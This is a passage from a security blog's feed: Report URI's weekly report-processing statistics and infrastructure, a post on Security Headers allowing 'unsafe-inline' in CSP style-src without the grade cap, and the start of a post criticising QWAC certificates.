Here&apos;s the diagram that explains our traffic flow, along with the explanation, and you can see it&apos;s the exact same diagram I <a href="https://scotthelme.co.uk/report-uri-a-week-in-numbers/?ref=scotthelme.co.uk" rel="noreferrer">published</a> over 5 years ago when I last spoke about it, and our infrastructure was the same long before that too:</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy"></figure><p></p><ol><li>Data is sent by web browsers as a POST request with a JSON payload.</li><li>Requests pass through our Cloudflare Worker which aggregates the JSON payloads from many requests, returning a 201 to the client.</li><li>Aggregated JSON payloads are dispatched to our origin &apos;ingestion&apos; servers on a short time interval.</li><li>The ingestion servers process the reports into Redis.</li><li>The &apos;consumer&apos; servers take batches of reports from Redis, applying advanced filters, threat intelligence, quota restrictions and per-user settings and filters, before placing them into persistent storage in Azure.</li></ol><p></p><p>When traffic volumes are low during the day, this entire processing pipeline averages less than sixty seconds from us receiving the report to you having the data in your dashboard and visible to you. When all of America is awake and online, our busiest period of the day, we typically see processing times between three and four minutes, with the odd outliers taking possibly five or six minutes to make it through. 
<p></p><h4 id="the-history-of-the-service">The history of the service</h4><p>I first launched Report URI in <a href="https://scotthelme.co.uk/csp-and-hpkp-violation-reporting-with-report-uri-io/?ref=scotthelme.co.uk" rel="noreferrer">May 2015</a> after having worked on it and used it myself for quite some time, and since then, I&apos;ve covered it extensively right here on my blog. You can find the older blog posts using <a href="https://scotthelme.co.uk/tag/report-uri-io/?ref=scotthelme.co.uk" rel="noreferrer">this tag</a>, and the newer ones using <a href="https://scotthelme.co.uk/tag/report-uri/?ref=scotthelme.co.uk" rel="noreferrer">this tag</a>, but any change worth mentioning is something I&apos;ve talked openly about. Here&apos;s a quick overview of how our report volume has grown over time.</p><p>Sep 2015 - <a href="https://scotthelme.co.uk/running-the-numbers-on-report-uri-io/?ref=scotthelme.co.uk" rel="noreferrer">250,000 reports processed in a single week</a><br>Sep 2016 - <a href="https://scotthelme.co.uk/introducing-sensible-limits-to-report-uri-io/?ref=scotthelme.co.uk" rel="noreferrer">25,000,000 reports per week</a><br>Mar 2017 - <a href="https://scotthelme.co.uk/report-uri-io-needs-your-support/?ref=scotthelme.co.uk" rel="noreferrer">80,000,000 reports per week</a><br>Jun 2017 - <a href="https://scotthelme.co.uk/report-uri-io-needs-your-support/?ref=scotthelme.co.uk" rel="noreferrer">677,000,000 reports per week</a><br>Jul 2018 - <a href="https://scotthelme.co.uk/report-uri-a-week-in-numbers/?ref=scotthelme.co.uk" rel="noreferrer">2,602,377,621 reports per week</a><br>Jun 2019 - <a href="https://scotthelme.co.uk/maintaining-state-in-a-cloudflare-worker-with-the-http-cache/?ref=scotthelme.co.uk" rel="noreferrer">4,064,516,129 reports per week</a><br>Mar 2021 - <a href="https://scotthelme.co.uk/report-uri-data-protection-update-2021/?ref=scotthelme.co.uk" rel="noreferrer">we hit half a trillion reports processed</a></p><p></p><p>That last one was a particularly big milestone and it felt like something really worth celebrating. Just think, half-a-trillion reports processed!</p><p></p>
<!--kg-card-begin: html-->
<blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">It&apos;s absolutely wild that I can now say we&apos;ve processed over HALF A TRILLION REPORTS for our customers! <br><br>The current total as of this tweet stands at:<br><br>500,205,618,910 reports!!! &#x1F632; <a href="https://t.co/jWQNQYX2dP?ref=scotthelme.co.uk">https://t.co/jWQNQYX2dP</a></p>&#x2014; Scott Helme (@Scott_Helme) <a href="https://twitter.com/Scott_Helme/status/1371099468108595200?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">March 14, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<!--kg-card-end: html-->
<p></p><p>We pushed on to hit our one trillionth report a little bit more quickly too! Michal even caught the point when it rolled over.</p><p></p>
<!--kg-card-begin: html-->
<blockquote class="twitter-tweet"><p lang="en" dir="ltr">1 trillion OMG we&apos;ve just processed 1 TRILLION reports &#x1F632;&#x1F60D;&#x1F37B; That&apos;s a loooooooooooot of JSON &amp; XML! Good job everyone &#x1F57A; <a href="https://twitter.com/reporturi?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@reporturi</a> <a href="https://twitter.com/Scott_Helme?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@Scott_Helme</a> <a href="https://twitter.com/troyhunt?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@troyhunt</a> <a href="https://t.co/fYohs4LmKD?ref=scotthelme.co.uk">pic.twitter.com/fYohs4LmKD</a></p>&#x2014; Michal &#x160;pa&#x10D;ek (@spazef0rze) <a href="https://twitter.com/spazef0rze/status/1490072406316261376?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">February 5, 2022</a></blockquote>
<!--kg-card-end: html-->
<p></p><p>Now, as I sit here, we&apos;ve pushed 1.5 trillion reports... But, enough about where we were, let&apos;s talk about where we are and what we&apos;re doing today, starting with what volumes we&apos;re processing now.</p><p></p><h4 id="from-the-top">From the top!</h4><p>Our first point of contact for any inbound report will be Cloudflare, so I&apos;m going to grab the data for the last 7 days from our dashboard to take a look at. Here&apos;s just the raw number of requests that we&apos;ve seen hit our edge.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="889" height="445" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image.png 600w, https://scotthelme.co.uk/content/images/2023/11/image.png 889w" sizes="(min-width: 720px) 720px"></figure><p></p><p>In the last 7 days we saw over <strong><em>3,870,000,000</em></strong> requests coming in! You can see many of our common patterns and trends in terms of the peaks and troughs throughout the day, and also that weekends are generally less busy than weekdays for us too. I love looking at our data egress graph because the only thing our reporting endpoint sends back is empty responses. They&apos;re usually either a 201 when we accept a report, or a 429 if you have exceeded your quota, but always empty, and there are a lot of them.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-1.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="892" height="457" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-1.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-1.png 892w" sizes="(min-width: 720px) 720px"></figure><p></p><p>We&apos;ve served a staggering <strong><em>3.67TB</em></strong> of empty responses over the last 7 days! I also like to watch trends in how data reaches us and we can also gather some really interesting information at this scale. Take any of the following metrics for example, where we can look at how our service is being used, seeing that most people are, as expected, generating report volume in report-only mode or via our CSP Wizard.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-2.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="442" height="199"></figure><p></p><p></p><p>We can also see some interesting data about clients sending reports too.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-3.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="433" height="196"></figure><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-4.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="445" height="202"></figure><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-5.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="439" height="193"></figure><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-6.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)"
(2023 edition)" loading="lazy" width="445" height="178"></figure><p></p><p>Of course, we see clients sending us many requests, but we&apos;ve still received reports from over <strong><em>80,000,000</em></strong> unique clients!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-7.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="700" height="145" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-7.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-7.png 700w"></figure><p></p><p>That&apos;s a lot of browsers... </p><p></p><h4 id="through-the-cloudflare-worker">Through the Cloudflare Worker</h4><p>All reports that hit our edge go through our Cloudflare Worker for processing. It does some basic sanitisation of the JSON payloads, normalisation, and maintains state about our users to know if they are exceeding their quota so reports can be dumped as early as possible. This of course means that the number of requests hitting our Worker is going to be the same as the number of requests we&apos;re receiving at the edge.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-8.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="1252" height="544" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-8.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-8.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-8.png 1252w" sizes="(min-width: 720px) 720px"></figure><p></p><p>What&apos;s interesting to see is that at peak times we&apos;re receiving around <strong><em>9,000 requests per second</em></strong> and that&apos;s a typical week for us. If a new customer joins suddenly, or an existing users deploys a misconfiguration suddenly, we&apos;ve seen spikes up and over 16,000 requests per second coming in. As I mentioned in the opening paragraph though, our Worker batches up reports from multiple requests and sends them to our origin after a short period, which you can see in our Subrequests metric. Despite receiving 3,900,000,000 requests in the last 7 days, the Worker has only sent 388,310,000 requests to our origin, meaning we&apos;re batching up ~10,000 reports per request to our origin on average. This is a metric we track to fine tune our aggregation and load, but looking at it live right now, we can see that the numbers line up.</p><p></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://scotthelme.co.uk/content/images/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="952" height="360" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview.png 600w, https://scotthelme.co.uk/content/images/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview.png 952w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Size of the payload coming from the Worker</span></figcaption></figure><p></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://scotthelme.co.uk/content/images/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview--1-.png" class="kg-image" alt="Report URI: A week in numbers! 
(2023 edition)" loading="lazy" width="952" height="360" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview--1-.png 600w, https://scotthelme.co.uk/content/images/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview--1-.png 952w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Number of distinct reports in the payload</span></figcaption></figure><p></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://scotthelme.co.uk/content/images/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview--3-.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="960" height="376" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview--3-.png 600w, https://scotthelme.co.uk/content/images/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview--3-.png 960w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Total number of reports in the payload</span></figcaption></figure><p></p><p>This translates to over 100 mb/s of JSON coming in to our origin per second, and bear in mind, this is <em>massively</em> normalised and deduplicated. Our ingestion servers take these reports and then process them into our Redis cache, so our outbound from these servers is pretty similar to the inbound, as not many reports are filtered/rejected at this stage.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-9.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="481" height="178"></figure><p></p><p></p><h4 id="into-the-redis-cache">Into the Redis cache</h4><p>Our Redis cache for reports is a bit of a beast, as you may have guessed, and it&apos;s where reports sit for a short period of time. The cache acts as a buffer to absorb spikes and also allows for a little bit of deduplication of identical reports that arrive in a short time period, further helping us optimise. Looking at the RAM consumption, you can see reports flowing into the cache and also see when the consumer servers pull a batch of reports out for processing.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-10.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="952" height="364" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-10.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-10.png 952w" sizes="(min-width: 720px) 720px"></figure><p></p><p></p><p>At present, we&apos;re not at our peak, but the Redis cache is handling almost 4,500 transactions per second, which isn&apos;t bad!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-11.png" class="kg-image" alt="Report URI: A week in numbers! 
(2023 edition)" loading="lazy" width="955" height="364" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-11.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-11.png 955w" sizes="(min-width: 720px) 720px"></figure><p></p><h4 id="consumption-time">Consumption time!</h4><p>The final stop in our infrastructure is through the consumer servers, which pull out batches of reports from the Redis cache to process into persistent storage in Azure Table Storage. We run a slightly smaller number of consumer servers with a lot more resources and these are the servers that are always being worked hard. Looking at their current CPU usage, they&apos;re sat at ~50% CPU as we start to approach the busiest time of the day, but they will still climb from here.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-12.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="958" height="379" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-12.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-12.png 958w" sizes="(min-width: 720px) 720px"></figure><p></p><p>The consumers will only see small spikes in inbound traffic when they pull a batch of reports from Redis, but they will always have a fairly consistent outbound bandwidth to Azure as they&apos;re pushing that data out to persistent storage.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-13.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="481" height="175"></figure><p></p><p></p><p>From here, it&apos;s on to the final stop for report data and after this point, it will visible in your dashboard to query, and any alerts/notifications will have been sent. </p><p></p><h4 id="azure-table-storage">Azure Table Storage</h4><p>I&apos;ve used Azure Table Storage since the beginning of Report URI and it&apos;s something that I&apos;ve never been given a good reason to move away from. It&apos;s a simple key:value store and is massively scalable, meaning I&apos;ve never had to learn how to be a DBA and it&apos;s always taken care of for me. You can read some of my <a href="https://scotthelme.co.uk/tag/table-storage/?ref=scotthelme.co.uk" rel="noreferrer">blog posts</a> about Table Storage, but let&apos;s see how much we&apos;re using it. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-14.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="1588" height="520" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-14.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-14.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-14.png 1588w" sizes="(min-width: 720px) 720px"></figure><p></p><p>This is our rate of transactions against Table Storage for the last week and as I happen to be writing this blog post on the 1st Nov 2023, all of our users have just had their monthly quota renewed. This happens at 00:00 UTC on the 1st day of each calendar month and it&apos;s why there is an enormous spike at the start of this graph and things were a lot more quiet before that. 
Of course, as we progress through a month, more of our users will exceed their monthly quota and reports will stop making it to persistent storage, mostly being dropped by the Cloudflare Worker and some by the consumer servers. It doesn&apos;t stop the reports being sent; it just means that we don&apos;t process them into persistent storage. Our current rate of transactions will slowly decline from where it is now down to the lowest levels by the end of the month again. As you would expect, our ingress and egress patterns follow the same trend.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-15.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="1585" height="541" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-15.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-15.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-15.png 1585w" sizes="(min-width: 720px) 720px"></figure><p></p><p></p><p>Something that was introduced quite some time ago was our 90-day retention period on report data. We will keep aggregate, count and analysis data for as long as you want, but the raw JSON of each inbound report will be purged after 90 days. We had to, simply because we couldn&apos;t store that much information for an unlimited period of time. Despite that, we still have an impressive <strong><em>4.9 TiB</em></strong> of data on disk consumed by <strong><em>2,250,000,000 entities</em></strong> (reports)!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-16.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="1585" height="538" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-16.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-16.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-16.png 1585w" sizes="(min-width: 720px) 720px"></figure><p></p><p>That&apos;s quite a lot of JSON! &#x1F605;</p><p></p><h4 id="where-do-we-go-from-here">Where do we go from here?</h4><p>Whilst all of the above are amazing numbers, you may have noticed that our current report volumes are lower than those we have previously peaked at, which were detailed at the start of this post. This is a trend I&apos;ve been following for a while now and I&apos;ve been able to put it down to a few things. The biggest impact is that we&apos;ve made really significant progress in helping our customers get up and running more quickly. Sites always send more reports and telemetry when they&apos;re first starting out using these technologies, and the faster we can help them get their configurations matured, the faster they can reduce the volume of reports they&apos;re sending. Despite this, we&apos;re always adding new sites, so even though our users are sending fewer reports on average, as we continue to grow, this has prevented our total volume from decreasing too much by constantly bringing new users on board.</p><p>Over the next year or so, we&apos;re also helping a lot of sites get ready for the new <a href="https://scotthelme.co.uk/pci-dss-4-0-its-time-to-get-serious-on-magecart/?ref=scotthelme.co.uk" rel="noreferrer">PCI DSS 4.0 requirements</a> and we&apos;re hoping to bring larger providers on board to provide our solution through them.  
The PCI SSC are putting huge pressure on sites with an e-commerce component to protect against Digital Skimming Attacks (a.k.a. <a href="https://report-uri.com/solutions/magecart_protection?ref=scotthelme.co.uk" rel="noreferrer">Magecart</a>) by locking down the JavaScript on their payment pages, something that CSP was literally designed for! As the natural choice for a reporting platform, we&apos;re well suited to help sites get their CSP defined, tested and deployed with the least friction possible. </p><p>I&apos;m excited for what the rest of 2023 will bring, but I&apos;m looking forward to 2024 already. Having built this company up from the first line of code almost 9 years ago, to where we are today, I wonder if it might be time to take the next big step soon! &#x1F60E;</p><p></p>]]></content:encoded></item><item><title><![CDATA[A Balanced Approach: New Security Headers Grading Criteria]]></title><description><![CDATA[<p>The Security Headers grading criteria is something that doesn&apos;t change often, but when it does, there&apos;s a good reason behind the change. In this blog, I will outline the new grading criteria and the reasons why we&apos;ve made the change.</p><p></p><p><strong>Information</strong>: This is a</p>]]></description><link>https://scotthelme.co.uk/a-balanced-approach-new-security-headers-grading-criteria/</link><guid isPermaLink="false">6523f5a4a095a10001c4252e</guid><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Wed, 08 Nov 2023 12:06:19 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/11/banner-1.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/11/banner-1.png" alt="A Balanced Approach: New Security Headers Grading Criteria"><p>The Security Headers grading criteria is something that doesn&apos;t change often, but when it does, there&apos;s a good reason behind the change. In this blog, I will outline the new grading criteria and the reasons why we&apos;ve made the change.</p><p></p><p><strong>Information</strong>: This is a cross-post from the <a href="https://probely.com/blog/a-balanced-approach-new-security-headers-grading-criteria?ref=scotthelme.co.uk" rel="noreferrer">Probely blog</a>; you can read the original article there.</p><p></p><h4 id="security-headers">Security Headers</h4><p>For those that aren&apos;t familiar, <a href="https://securityheaders.com/?ref=scotthelme.co.uk" rel="noreferrer">Security Headers</a> is a free security scanning tool that takes only a couple of seconds to conduct a scan. 
Your site can be awarded anything from an A+ grade down to an F grade, all depending on the configuration of your HTTP Response Headers.</p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/Logo-02.jpg" class="kg-image" alt="A Balanced Approach: New Security Headers Grading Criteria" loading="lazy" width="2000" height="1125" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/Logo-02.jpg 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/10/Logo-02.jpg 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/10/Logo-02.jpg 1600w, https://scotthelme.co.uk/content/images/size/w2400/2023/10/Logo-02.jpg 2400w" sizes="(min-width: 720px) 720px"></figure><p>If you want to conduct a scan, head over there now to check your grade and you will be tested against the new criteria outlined below.</p><p></p><h4 id="existing-criteria">Existing Criteria</h4><p>The grading criteria is quite clear as all of the headers that we score are listed in the summary section, making it easy to see which headers you&apos;re getting right, and which headers you&apos;re missing. Take, for example, the scan of my personal blog <a href="https://securityheaders.com/?q=scotthelme.co.uk&amp;followRedirects=on&amp;ref=scotthelme.co.uk" rel="noreferrer">here</a>:</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/image.png" class="kg-image" alt="A Balanced Approach: New Security Headers Grading Criteria" loading="lazy" width="883" height="364" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/image.png 600w, https://scotthelme.co.uk/content/images/2023/10/image.png 883w" sizes="(min-width: 720px) 720px"></figure><p></p><p>You can see that I have all of the headers present, which is why they&apos;re highlighted in green, but I&apos;m still not achieving the highest possible grade of an A+ because I have a warning.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/image-1.png" class="kg-image" alt="A Balanced Approach: New Security Headers Grading Criteria" loading="lazy" width="886" height="172" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/image-1.png 600w, https://scotthelme.co.uk/content/images/2023/10/image-1.png 886w" sizes="(min-width: 720px) 720px"></figure><p></p><p>This warning is the most frequently raised question about our grading, and in truth, it&apos;s basically the only thing that&apos;s ever raised.</p><p></p><h4 id="using-unsafe-inline-in-csp-style-src">Using &apos;unsafe-inline&apos; in CSP style-src</h4><p>The warning here is given because I have the <code>&apos;unsafe-inline&apos;</code> value in my CSP <code>style-src</code> directive, allowing me to use inline styles on the page. Sites will sometimes do this because it&apos;s convenient, because they use a theme that requires it, because one of the libraries they use requires it, or for a whole bunch of other reasons. An inline style might look like one of the following:</p><pre><code class="language-html">&lt;html&gt;
  &lt;head&gt;
    &lt;style&gt;
      p {
        color: green;
      }
    &lt;/style&gt;
  &lt;/head&gt;
&lt;/html&gt;</code></pre><p></p><pre><code class="language-html">&lt;p style=&quot;color: green;&quot;&gt;This paragraph is green.&lt;/p&gt;</code></pre><p></p><p>The problem with allowing unsafe inline styles is that an attacker could inject styles into the page and the browser wouldn&apos;t know whether they were put there by the host of the website or by an attacker, so they&apos;d be applied either way. </p><p>As a good example of where <code>&apos;unsafe-inline&apos;</code> might be required, just take a look at the <a href="https://angular.io/guide/security?ref=scotthelme.co.uk#content-security-policy" rel="noreferrer">CSP docs</a> for Angular:</p><blockquote>The minimal policy required for brand new Angular is:<br><code>default-src &apos;self&apos;; style-src &apos;self&apos; &apos;unsafe-inline&apos;;</code></blockquote><p></p>
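<p>For a sense of what that looks like in practice, here&apos;s roughly how a policy like the Angular example could be set from a PHP application. This is a minimal, illustrative sketch: the directive values are examples only, and the <code>report-uri</code> endpoint is a placeholder for your own reporting address.</p><pre><code class="language-php">&lt;?php
// Minimal sketch: a CSP that permits inline styles but not inline
// scripts. Directive values are purely illustrative.
header(
    &quot;Content-Security-Policy: &quot; .
    &quot;default-src &apos;self&apos;; &quot; .
    &quot;script-src &apos;self&apos;; &quot; .             // no &apos;unsafe-inline&apos; for scripts!
    &quot;style-src &apos;self&apos; &apos;unsafe-inline&apos;; &quot; .
    &quot;report-uri https://example.report-uri.com/r/d/csp/enforce&quot; // placeholder
);</code></pre><p></p>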
<h4 id="can-you-get-pwned-with-css">Can you get pwned with CSS?</h4><p>It&apos;s an interesting question, and one I&apos;ve been considering for a long time now. I even put the question out to the wider community back in Feb 2022 with a Twitter poll and a blog post by the same title: <a href="https://scotthelme.co.uk/can-you-get-pwned-with-css/?ref=scotthelme.co.uk" rel="noreferrer">Can you get pwned with CSS?</a></p><p></p>
<!--kg-card-begin: html-->
<center><blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">I&apos;m considering changing the grading criteria on <a href="https://twitter.com/securityheaders?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@securityheaders</a> to allow an A+ grade with a CSP that contains unsafe-inline in the style-src directive. What are your thoughts?</p>&#x2014; Scott Helme (@Scott_Helme) <a href="https://twitter.com/Scott_Helme/status/1496480723187998723?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">February 23, 2022</a></blockquote></center> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<!--kg-card-end: html-->
<p></p><p>Allowing <code>&apos;unsafe-inline&apos;</code> in the <code>script-src</code> directive of CSP is obviously dangerous and can lead to an almost infinite number of bad things happening, but as it turns out, the damage that can be done with styles is quite limited. Not only that, but I&apos;ve yet to find any credible evidence of an attack happening where malicious styles were the attack vector. Even with widespread feedback from the community, the hypothetical issues are few and far between.</p><p></p><h4 id="what-are-we-trying-to-achieve">What are we trying to achieve?</h4><p>For me, any question on our grading criteria comes back to this point. Which of the following are we aiming for?</p><p></p><ol><li>The absolute best configuration possible, regardless of anything. </li><li>A sensible balance that it would be beneficial for everyone to achieve.</li></ol><p></p><p>As time has gone by, I&apos;ve seen security absolutists push us towards #1 on more occasions than I can count, but I&apos;ve also realised that achieving #2 would take us to a far better place overall. This is what we&apos;re focusing on with this change.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/image-3.png" class="kg-image" alt="A Balanced Approach: New Security Headers Grading Criteria" loading="lazy" width="835" height="148" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/image-3.png 600w, https://scotthelme.co.uk/content/images/2023/10/image-3.png 835w" sizes="(min-width: 720px) 720px"></figure><p></p><h4 id="allowing-unsafe-inline-in-csp-style-src">Allowing &apos;unsafe-inline&apos; in CSP style-src</h4><p>As of the publication of this blog post, Security Headers will be relaxing the grade cap penalty for using <code>&apos;unsafe-inline&apos;</code> in CSP <code>style-src</code>, which will, all else being good, allow you to achieve an A+ grade! The warning will still be present, because long term we should still try to move away from it, or at least not introduce it, but the grade cap will no longer ding your score.</p><p>To be clear, a site will still have had to put serious thought and effort into the configuration of their Security Headers, but now, I think the A+ grade means you&apos;ve achieved something that I&apos;d be happy to see all sites achieve. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/image-2.png" class="kg-image" alt="A Balanced Approach: New Security Headers Grading Criteria" loading="lazy" width="889" height="337" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/image-2.png 600w, https://scotthelme.co.uk/content/images/2023/10/image-2.png 889w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Scan your site for <a href="https://securityheaders.com/?ref=scotthelme.co.uk" rel="noreferrer">free</a> and tag us in your results! You&apos;ll get a cool badge when sharing a link to your scan results on social media! &#x1F60E;</p><p></p>]]></content:encoded></item><item><title><![CDATA[What the QWAC?!]]></title><description><![CDATA[<p>Almost 2 years on from the last time I wrote about QWACs, I&apos;m sadly not here to tell you that things have gone well since then. 
In fact, I&apos;m actually here to tell you that things are not going well at all...</p><p></p><h4 id="qwac">QWAC</h4><p>Back in Jan</p>]]></description><link>https://scotthelme.co.uk/what-the-qwac/</link><guid isPermaLink="false">654a004e5065ae0001b5e1d7</guid><category><![CDATA[QWAC]]></category><category><![CDATA[eIDAS]]></category><category><![CDATA[TLS]]></category><category><![CDATA[PKI]]></category><category><![CDATA[EV]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Tue, 07 Nov 2023 14:56:27 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/11/ec.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/11/ec.png" alt="What the QWAC?!"><p>Almost 2 years on from the last time I wrote about QWACs, I&apos;m sadly not here to tell you that things have gone well since then. In fact, I&apos;m actually here to tell you that things are not going well at all...</p><p></p><h4 id="qwac">QWAC</h4><p>Back in Jan 2022, I wrote a blog post that went into detail on what a QWAC, or Qualified Website Authentication Certificate, actually is: <a href="https://scotthelme.co.uk/looks-like-a-duck-swims-like-a-duck-qwacs-like-a-duck-probably-an-ev-certifiacate/?ref=scotthelme.co.uk" rel="noreferrer">If it looks like a duck, swims like a duck, and QWACs like a duck, then it&apos;s probably an EV Certificate</a></p><p>TLDR; It&apos;s an EV Certificate all over again &#x1F937;&#x200D;&#x2642;&#xFE0F;</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/facepalm-crowd.gif" class="kg-image" alt="What the QWAC?!" loading="lazy" width="498" height="274"></figure><p></p><p>In all seriousness though, that&apos;s actually quite a long and detailed post about the shortcomings of QWACs and why they&apos;re just a terrible, terrible idea. They&apos;re only being pushed by organisations that would make $$$ selling them (funny that) and it&apos;s like the entire mess of EV has been conveniently forgotten. I&apos;m not here to re-tread the same ground, though; I&apos;m here to talk about something even more concerning. You might think &quot;ok, so we have a new type of pointless certificate available&quot;, and if that were the case, I wouldn&apos;t be writing about it again 